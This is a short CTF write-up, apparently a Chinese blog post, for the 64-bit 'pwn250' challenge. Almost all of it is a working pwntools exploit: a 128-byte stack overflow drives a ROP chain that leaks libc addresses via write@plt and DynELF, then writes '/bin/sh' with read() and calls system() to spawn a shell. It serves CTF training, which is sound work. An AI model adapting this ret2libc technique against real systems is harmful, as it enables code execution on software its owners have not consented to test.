五_4.泄露libc_ctf2017-pwn250_64

2019-05-02  本文已影响0人  Zero_0_0

注：一个 64 位、有 read/write 的、能看见 flag 的题（自己和胜利只差一个 exp）

EXP
from pwn import*


p =process('./pwn250')
elf = ELF('./pwn250')
# Addresses below are hard-coded for this particular ./pwn250 build (the
# 0x40xxxx values suggest a non-PIE binary — confirm). The gadget names are
# the author's; they are not verified anywhere in this script.
pop3_addr = 0x40056a  # presumably a gadget that pops three registers — confirm in the disassembly
write_plt_addr = elf.plt['write']  # resolved from the binary's PLT rather than hard-coded
start_addr = 0x0400470  # return target appended after each leak so the process re-enters its entry
where_bin_sh_addr = 0x601070  # writable location that stage 2 fills via read() and passes to system()
pop1_addr = 0x400633  # presumably a single-pop gadget — confirm in the disassembly
def leak(addr):
    """Leak 4 bytes of the target's memory at *addr* (DynELF leak callback).

    The chain sent here re-uses the same 128-byte overflow as stage 2: after
    the pop3 gadget it supplies (1, addr, 8) and returns into write@plt, then
    into start_addr so the process can be driven again for the next leak.
    (Which register each popped value lands in is assumed from the gadget
    names — confirm against the disassembly.)  Only the first 4 received
    bytes are returned; each leaked word is echoed as hex for tracing.
    Python 2 only: relies on ``str.encode('hex')`` and str/bytes being one type.
    """
    chain = [
        'A' * 128,
        p64(0),
        p64(pop3_addr),
        p64(1),
        p64(addr),
        p64(8),
        p64(write_plt_addr),
        p64(start_addr),
    ]
    p.send(''.join(chain))
    leaked = p.recv()[:4]

    print ("%#x -> %s"%(addr,(leaked or '').encode('hex')))
    return leaked


# pwntools DynELF resolves libc symbols purely through the leak() callback,
# so no local copy of the target's libc is needed.
d =DynELF(leak, elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
log.info("[+]system_addr = %#x",system_addr)
log.info("[+]read_addr = %#x",read_addr)


# Stage 2: with system/read resolved, the chain first returns into read()
# with (0, where_bin_sh_addr, 8) after the pop3 gadget, then into the pop1
# gadget with where_bin_sh_addr before calling system().  The register
# mapping of the gadgets is assumed from their names — confirm.
payload = ''.join([
    'A' * 128,
    p64(0),
    p64(pop3_addr),
    p64(0),
    p64(where_bin_sh_addr),
    p64(8),
    p64(read_addr),
    p64(pop1_addr),
    p64(where_bin_sh_addr),
    p64(system_addr),
])

p.sendline(payload)
sleep(0.1)  # brief pause, presumably so the target reaches read() before the string is sent
p.sendline('/bin/sh\x00')
p.interactive()


